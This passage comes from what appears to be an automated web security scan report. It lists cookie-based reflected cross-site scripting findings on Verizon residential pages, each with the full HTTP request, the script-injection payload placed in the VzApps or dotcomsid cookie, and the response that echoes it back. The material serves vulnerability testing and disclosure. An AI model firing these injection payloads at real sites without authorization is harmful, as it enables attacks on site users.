Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=adc43"-alert(1)-"8aa6b87ac33; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 125619
Expires: Sat, 20 Nov 2010 02:57:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "adc43"-alert(1)-"8aa6b87ac33"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: docu
...[SNIP]...

1.165. https://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72a2a'><script>alert(1)</script>3f33f50afae was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX72a2a'><script>alert(1)</script>3f33f50afae; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58779
Expires: Sat, 20 Nov 2010 02:55:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX72a2a'><script>alert(1)</script>3f33f50afae; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX72A2A'><SCRIPT>ALERT(1)</SCRIPT>3F33F50AFAE ' />
...[SNIP]...

1.166. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 8b27c<script>alert(1)</script>9b933fecabb was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8b27c<script>alert(1)</script>9b933fecabb; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 02:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:58:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX8b27c<script>alert(1)</script>9b933fecabb; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:58:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B27C<SCRIPT>ALERT(1)</SCRIPT>9B933FECABB </DIV>
...[SNIP]...

1.167. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 429f7'><script>alert(1)</script>ffc246269ca was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX429f7'><script>alert(1)</script>ffc246269ca; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX429f7'><script>alert(1)</script>ffc246269ca; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX429F7'><SCRIPT>ALERT(1)</SCRIPT>FFC246269CA ' />
...[SNIP]...

1.168. https://www22.verizon.com/Residential/FiOSInternet/Overview.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8315"-alert(1)-"72b07553601 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=a8315"-alert(1)-"72b07553601; 